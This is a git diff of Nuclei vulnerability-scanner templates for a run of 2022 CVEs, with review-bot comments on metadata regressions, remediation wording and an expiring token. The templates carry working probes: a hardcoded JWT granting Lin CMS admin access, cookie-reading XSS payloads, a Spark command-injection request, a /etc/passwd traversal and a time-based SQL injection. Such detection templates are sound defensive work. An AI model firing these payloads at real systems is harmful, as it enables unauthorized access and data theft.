@@ -0,0 +1,61 @@ +id: CVE-2022-32430 + +info: + name: Lin CMS Spring Boot - Default JWT Token + author: DhiyaneshDK + severity: high + description: | + An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application. + reference: + - https://github.com/TaleLin/lin-cms-spring-boot + - https://web.archive.org/web/20220721190946/https://www.mesec.cn/archives/277 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32430 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-32430 + epss-score: 0.00227 + epss-percentile: 0.60316 + cpe: cpe:2.3:a:talelin:lin-cms-spring-boot:0.2.1:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: talelin + product: lin-cms-spring-boot + fofa-query: body="心上无垢,林间有风" + tags: cve,cve2022,lin-cms,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/cms/admin/group/all" + headers: + Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"id":' + - '"name":' + - '"level":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + + - type: word + part: body + words: + - '<html' + - '<body' + - '<script' + negative: true +# digest: 4a0a00473045022100bdeff498f1f612fac7529406701fa2c1f6c36e0a20d7c8938adf45c40af8e88402204ebb5a59a63fafab1d1db6752328c1c4b67009af43da014df47524912c3ca82b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32770.yaml b/nuclei-templates/CVE-2022/CVE-2022-32770.yaml index 8eb2c1da0d..8a03aa579d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32770.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32770.yaml 
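Review bot: The bearer token hardcoded in the `Authorization` header carries an expiry: if I decode its payload segment correctly it is `{"identity":1,"scope":"lin","type":"access","exp":1753193479}`, i.e. `exp` around 2025-07-22, after which the server will reject the token and the template silently reports nothing even on an affected install. A comment on the header line should record this, e.g. `# NOTE: token carries exp=1753193479 (~2025-07-22); the check yields false negatives after that date`, so a clean scan is not mistaken for a fixed deployment. The `classification` block also lacks a `cwe-id`, which every other template in this commit carries; CWE-284 or CWE-798 would fit the description, but confirm against the NVD entry before adding it.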
@@ -6,6 +6,10 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql @@ -15,12 +19,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32770 cwe-id: CWE-79 + epss-score: 0.00103 + epss-percentile: 0.41592 + cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wwbn + product: avideo shodan-query: http.html:"AVideo" - verified: "true" - tags: cve,cve2022,avideo,xss,wwbn + tags: cve2022,cve,avideo,xss,wwbn -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E" @@ -40,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a0046304402205070fa2cc17c809a810baa1e6b6c9efb5acdfa42715da7c7f2d6cf0b62934576022045e59a8169ca884549c6f435801ed6873531f867ccc9de4433c0f251a1fa050f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32771.yaml b/nuclei-templates/CVE-2022/CVE-2022-32771.yaml index 1f88718ad7..99d9a0c458 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32771.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32771.yaml 
@@ -6,21 +6,33 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql - https://nvd.nist.gov/vuln/detail/CVE-2022-32771 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32771 cwe-id: CWE-79 + epss-score: 0.00074 + epss-percentile: 0.30395 + cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wwbn + product: avideo shodan-query: http.html:"AVideo" - verified: "true" - tags: cve,cve2022,avideo,xss + tags: cve,cve2022,avideo,xss,wwbn -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E" @@ -42,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a0046304402205cd915db0a5e75b5298087a9d97667756ac6598deed750cf8ae835d0fb3052370220337036c281cbdf23199d21ac1cf6cf370e1cb4aecf7531ed418daf886f164cf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32772.yaml b/nuclei-templates/CVE-2022/CVE-2022-32772.yaml index 1fbbc00bbf..77d222d80a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32772.yaml 
+++ b/nuclei-templates/CVE-2022/CVE-2022-32772.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql @@ -15,12 +19,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32772 cwe-id: CWE-79 + epss-score: 0.00056 + epss-percentile: 0.21026 + cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wwbn + product: avideo shodan-query: http.html:"AVideo" - verified: "true" - tags: cve,cve2022,avideo,xss,wwbn + tags: cve2022,cve,avideo,xss,wwbn -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E" @@ -40,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4a0a0047304502200250c5a4a2f2f305db862778645d4302544e55e4d9df38285ae08572bbb8461c022100d024e870443986b8f5a4c16ed8f86c0807f0369aea5fbaa7f1dfde75e0c0bb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-33119.yaml b/nuclei-templates/CVE-2022/CVE-2022-33119.yaml index c147ddcde0..223c8ed044 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-33119.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-33119.yaml 
@@ -1,38 +1,23 @@
 id: CVE-2022-33119
-
 info:
- name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting
+ name: NVRsolo v03.06.02 - Cross-Site Scripting
 author: arafatansari
 severity: medium
 description: |
- NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.
- impact: |
- Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
- remediation: |
- Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software.
+ NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php.
 reference:
 - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md
 - https://nvd.nist.gov/vuln/detail/CVE-2022-33119
- - https://github.com/ARPSyndicate/cvemon
- - https://github.com/ARPSyndicate/kenzer-templates
- - https://github.com/badboycxcc/badboycxcc
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 cvss-score: 6.1
 cve-id: CVE-2022-33119
 cwe-id: CWE-79
- epss-score: 0.0157
- epss-percentile: 0.86981
- cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:*
 metadata:
- verified: true
- max-request: 1
- vendor: nuuo
- product: nvrsolo_firmware
 shodan-query: http.html:"NVRsolo"
- tags: cve,cve2022,nvrsolo,xss,nuuo
-
-http:
+ verified: "true"
+ tags: cve,cve2022,nvrsolo,xss
+requests:
 - raw:
 - |
 POST /login.php HTTP/1.1
@@ -41,12 +26,10 @@ http:
 Referer: "><script>alert(document.domain)</script><"
 language=en&user=user&pass=pass&submit=Login
-
 matchers:
 - type: dsl
 dsl:
- - 'contains(header, "text/html")'
+ - 'contains(all_headers, "text/html")'
 - 'status_code == 200'
 - contains(body,'<script>alert(document.domain)</script><\"?cmd=')
 condition: and
-# digest: 4a0a00473045022100f0f38f1056959a80fda5a1d4ced07d7ae1ac102a7ba4c692c0b0150a62461f0502205b4da7a44c66b407918128ef1f68b82728505e5d40ef1467678a122bd7212b0b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-33891.yaml b/nuclei-templates/CVE-2022/CVE-2022-33891.yaml
index 1ecb9899b9..0e8cd9ebfd 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-33891.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-33891.yaml
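Review bot: The new side of CVE-2022-33119 goes against the rest of the commit: it drops `impact`, `remediation`, the `epss-*`/`cpe` fields and `max-request`/`vendor`/`product`, reverts `http:` to the legacy `requests:` key and `verified: true` to the string `"true"`, and the second hunk deletes the signed `# digest:` line. Every other migrated template in this commit moves in the opposite direction, so this looks like an older copy overwriting a newer one during the automated sync rather than a deliberate edit; if it is deliberate, the commit message should say so. CVE-2022-34046 (hunks ending at L1427) shows the same regression.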
@@ -1,32 +1,43 @@
 id: CVE-2022-33891
+
 info:
- name: Apache Spark UI - Command Injection
+ name: Apache Spark UI - Remote Command Injection
 author: princechaddha
 severity: high
 description: |
- The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
+ Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow impersonation by providing an arbitrary user name. An attacker can potentially reach a permission check function that will ultimately build a Unix shell command based on input and execute it, resulting in arbitrary shell command execution. Affected versions are 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1.
+ impact: |
+ Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
+ remediation: |
+ Apply the latest security patches or updates provided by Apache Spark to fix the remote command injection vulnerability.
 reference:
 - https://github.com/W01fh4cker/cve-2022-33891
- - https://nvd.nist.gov/vuln/detail/CVE-2022-33891
 - https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc
 - http://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-33891
+ - http://www.openwall.com/lists/oss-security/2023/05/02/1
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 8.8
 cve-id: CVE-2022-33891
- cwe-id: CWE-77
+ cwe-id: CWE-78
+ epss-score: 0.97289
+ epss-percentile: 0.99851
+ cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*
 metadata:
+ verified: true
+ max-request: 1
+ vendor: apache
+ product: spark
 shodan-query: title:"Spark Master at"
- verified: "true"
- tags: packetstorm,cve,cve2022,apache,spark,authenticated
-
+ tags: cve2022,cve,apache,spark,authenticated,kev,packetstorm
 variables:
 command: "echo CVE-2022-33891 | rev"
-requests:
+http:
 - method: GET
 path:
- - '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`'
+ - '{{BaseURL}}/?doAs=`{{url_encode("{{command}}")}}`'
 matchers-condition: and
 matchers:
@@ -34,3 +45,4 @@ requests:
 part: body
 words:
 - "19833-2202-EVC"
+# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-33901.yaml b/nuclei-templates/CVE-2022/CVE-2022-33901.yaml
index 079bedd9c4..2294352f6f 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-33901.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-33901.yaml
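Review bot: The new `remediation` for CVE-2022-33891 only says `Apply the latest security patches or updates provided by Apache Spark`, while the description enumerates the affected ranges precisely; naming the first fixed releases would make the advice actionable, e.g. `Upgrade to Apache Spark 3.1.3, 3.2.2 or 3.3.0 (or later).` — those are the maintenance releases named in the linked Apache thread, confirm before committing. The `cpe` entry added here uses a wildcard version for the same product, which is acceptable but means the affected range lives only in free text. The `cwe-id` move from CWE-77 to CWE-78 is consistent with the shell-command nature of the issue.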
@@ -1,41 +1,54 @@
 id: CVE-2022-33901
 info:
- name: MultiSafepay plugin for WooCommerce <= 4.13.1 - Unauthenticated Arbitrary File Read
+ name: WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read
 author: theamanrawat
 severity: high
 description: |
- Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress.
+ WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+ impact: |
+ An attacker can access sensitive information stored in arbitrary files on the server, potentially leading to further compromise of the system.
+ remediation: |
+ Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.1 or later.
 reference:
 - https://wordpress.org/plugins/multisafepay/
- - https://nvd.nist.gov/vuln/detail/CVE-2022-33901
 - https://wordpress.org/plugins/multisafepay/#developers
 - https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-33901
+ - https://github.com/ARPSyndicate/kenzer-templates
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 cvss-score: 7.5
 cve-id: CVE-2022-33901
+ epss-score: 0.00779
+ epss-percentile: 0.80981
+ cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:*
 metadata:
- verified: "true"
- tags: cve,cve2022,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce
+ verified: true
+ max-request: 1
+ vendor: multisafepay
+ product: multisafepay_plugin_for_woocommerce
+ framework: wordpress
+ tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce
-requests:
+http:
 - method: GET
 path:
 -
"{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"
 matchers-condition: and
 matchers:
- - type: regex
- part: body
- regex:
- - "root:.*:0:0:"
-
 - type: word
 part: header
 words:
 - "application/octet-stream"
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
 - type: status
 status:
 - 200
+# digest: 490a0046304402202ae9ccfcd2d44fcb8006ba953a197c97d4ecfacdad1348585abddafee07bb83102204e83d79dbe8ee0856aa30e9d9833f4f2d553fd603b0952a23e5c83d208c62401:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-33965.yaml b/nuclei-templates/CVE-2022/CVE-2022-33965.yaml
index 28c11b0507..a7b0e3bfcc 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-33965.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-33965.yaml
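Review bot: The added `remediation` line tells users to update to `version 4.13.1 or later`, but the template's own `name` (`<=4.13.1`) and description (`through 4.13.1`) mark 4.13.1 as affected, so the advice points at a vulnerable release. It should name the first fixed version — per the linked Patchstack advisory this appears to be 4.13.2 (confirm) — e.g. `Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.2 or later.`. The new description's `modify data, and/or execute unauthorized administrative operations` is boilerplate that overstates an arbitrary file read rated C:H/I:N/A:N in the template's own CVSS vector. The reordering of the regex and word matchers is behaviour-neutral under `matchers-condition: and`.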
@@ -6,40 +6,51 @@ info:
 severity: critical
 description: |
 WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
+ remediation: |
+ Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability.
 reference:
 - https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities
 - https://wordpress.org/plugins/wp-stats-manager/
 - https://wordpress.org/plugins/wp-stats-manager/#developers
 - https://nvd.nist.gov/vuln/detail/CVE-2022-33965
+ - https://github.com/20142995/sectool
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2022-33965
 cwe-id: CWE-89
+ epss-score: 0.01233
+ epss-percentile: 0.83986
+ cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*
 metadata:
+ verified: true
+ max-request: 1
+ vendor: plugins-market
+ product: wp_visitor_statistics
+ framework: wordpress
 google-query: inurl:"/wp-content/plugins/wp-stats-manager"
- verified: "true"
- tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager
+ tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market
-requests:
+http:
 - raw:
 - |
 @timeout: 15s
- GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1
+ GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1
 Host: {{Hostname}}
 matchers-condition: and
 matchers:
 - type: dsl
 dsl:
- -
'duration>=5'
+ - 'duration>=7'
 - type: regex
 regex:
- - "^1331' and sleep\\(5\\) or '$"
+ - "^1331' and sleep\\(7\\) or '$"
 - type: status
 status:
 - 200
-
-# Enhanced by md on 2022/12/13
+# digest: 490a004630440220458bd56d4667cfa3e15751e8422d0ba54e709c7e9d7a857053c0307e24cdaa8302205b0be1ac0171f03bb15ec954e402ff2fba222f6711aa86faffac17ebffc02f19:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34045.yaml b/nuclei-templates/CVE-2022/CVE-2022-34045.yaml
index 57a05f35dd..c894429126 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-34045.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-34045.yaml
@@ -6,20 +6,32 @@ info:
 severity: critical
 description: |
 WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. It contains a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+ impact: |
+ An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.
+ remediation: |
+ Apply the latest firmware update provided by the vendor to fix the access control issue.
 reference:
 - https://drive.google.com/file/d/1s5uZGC_iSzfCJt9BJ8h-P24vmsrmttrf/view?usp=sharing
 - https://nvd.nist.gov/vuln/detail/CVE-2022-34045
+ - https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/ARPSyndicate/cvemon
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2022-34045
 cwe-id: CWE-798
+ epss-score: 0.05662
+ epss-percentile: 0.93156
+ cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*
 metadata:
+ verified: true
+ max-request: 1
+ vendor: wavlink
+ product: wl-wn530hg4_firmware
 shodan-query: http.html:"WN530HG4"
- verified: "true"
 tags: cve,cve2022,wavlink,exposure
-requests:
+http:
 - raw:
 - |
 GET /backupsettings.dat HTTP/1.1
@@ -40,5 +52,4 @@ requests:
 - type: status
 status:
 - 200
-
-# Enhanced by md on 2023/02/03
+# digest: 4a0a00473045022100fb0b8aa54fde332f8cd44ca55dfda68ee8eaad6e9c47f58cd20feb3873a04ac402206045d384f557a00bd359d936396b51e46a94bd70a5ff2e253f622d481a211aab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34046.yaml b/nuclei-templates/CVE-2022/CVE-2022-34046.yaml
index b1060a2f78..0e55de9a03 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-34046.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-34046.yaml
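Review bot: The `remediation` added for CVE-2022-34045 asserts that a vendor firmware update fixes the issue, but nothing in `reference:` is a vendor advisory (a Google Drive PoC, NVD and two aggregator repos), so the template does not support its own claim. Either add the vendor bulletin to `reference:` or soften the text, e.g. `No vendor advisory is referenced; check the vendor's firmware page for an update and keep the management interface off untrusted networks.`. The same sentence is added verbatim to CVE-2022-34576 (hunk ending at L1434) with the same gap.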
@@ -1,43 +1,22 @@
 id: CVE-2022-34046
-
 info:
- name: WAVLINK WN533A8 - Improper Access Control
+ name: Wavlink Sysinit.shtml - Password Exposure
 author: For3stCo1d
 severity: high
 description: |
- WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
- impact: |
- An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the entire network.
- remediation: |
- Apply the latest firmware update provided by the vendor to fix the access control issue.
+ An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);].
 reference:
 - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046
- - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html
- - https://nvd.nist.gov/vuln/detail/CVE-2022-34046
- - https://github.com/ARPSyndicate/cvemon
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2022-34046
- cwe-id: CWE-863
- epss-score: 0.14292
- epss-percentile: 0.95577
- cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
 metadata:
 verified: true
- max-request: 1
- vendor: wavlink
- product: wn533a8_firmware
 shodan-query: http.title:"Wi-Fi APP Login"
- tags: cve,cve2022,packetstorm,wavlink,router,exposure
-
-http:
+ tags: cve,cve2022,wavlink,router,exposure
+requests:
 - raw:
 - |
 GET /sysinit.shtml?r=52300 HTTP/1.1
 Host: {{Hostname}}
- matchers-condition: and
 matchers:
 - type: word
@@ -46,13 +25,10 @@ http:
 - 'var syspasswd="'
 - '<title>APP'
 condition: and
-
 - type: status
 status:
 - 200
-
 extractors:
 - type: regex
 regex:
 - 'syspasswd="(.+?)"'
-# digest: 4a0a004730450220012d32e7af94355d9d79d3210f97d2bdf114e7d81c8a425f14611b6898afdcb2022100d2e6dd7fe5b5f462e9bccc0179f3417fa34f94d1006498add8171cba0ec4af4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34048.yaml b/nuclei-templates/CVE-2022/CVE-2022-34048.yaml
index 2f5e680805..7292a945a4 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-34048.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-34048.yaml
@@ -1,16 +1,15 @@
 id: CVE-2022-34048
-
 info:
- name: Wavlink WN-533A8 - Cross-Site Scripting
+ name: Wavlink WN533A8 - Cross-Site Scripting (XSS)
 author: ritikchaddha
 severity: medium
 description: |
- Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter.
+ Wavlink WN533A8 M33A8.V5030.190716 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter.
 reference:
 - https://www.exploit-db.com/exploits/50989
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-34048
 - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing
 - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing
- - https://nvd.nist.gov/vuln/detail/CVE-2022-34048
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 cvss-score: 6.1
@@ -19,8 +18,7 @@ info:
 metadata:
 shodan-query: http.html:"Wavlink"
 verified: "true"
- tags: cve2022,wavlink,xss,router,edb,cve
-
+ tags: cve,cve2022,wavlink,xss,router
 requests:
 - raw:
 - |
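Review bot: The new side of CVE-2022-34046 deletes the whole `classification:` block, so the template no longer carries `cve-id`, `cvss-metrics`, `cvss-score` or `cwe-id`, and tooling that correlates findings by `cve-id` will not be able to tie this template to the CVE at all; the `cpe`, `epss-*` and the PacketStorm/NVD references go with it. This is the same `http:`→`requests:` / digest-removing regression as CVE-2022-33119 earlier in the commit, but here it also strips required metadata; restoring the removed `classification:` lines is the minimum fix. The second hunk only removes blank lines and the `# digest:` line, so the matcher and extractor logic is unchanged.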
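Review bot: The new `tags` line for CVE-2022-34048 drops `edb` although `https://www.exploit-db.com/exploits/50989` remains the first reference; elsewhere in this commit the source tags (`packetstorm`, `wpscan`, `huntr`) are kept in step with the references, so this should read `tags: cve,cve2022,wavlink,xss,router,edb`. The template is also left on the legacy `requests:` key with `verified: "true"` as a string, unlike the templates migrated in the same commit.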
@@ -28,21 +26,16 @@ requests:
 Host: {{Hostname}}
 newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en
- matchers-condition: and
 matchers:
 - type: word
 part: body
 words:
 - 'x");alert(9);x=("?login=0");'
-
 - type: word
 part: header
 words:
 - "text/html"
-
 - type: status
 status:
 - 200
-
-# Enhanced by mp on 2022/09/14
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34093.yaml b/nuclei-templates/CVE-2022/CVE-2022-34093.yaml
index b44f12cab0..d7d192cc8f 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-34093.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-34093.yaml
@@ -11,20 +11,21 @@ info:
 - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44
 - https://owasp.org/www-community/attacks/xss/
 - https://softwarepublico.gov.br/social/i3geo
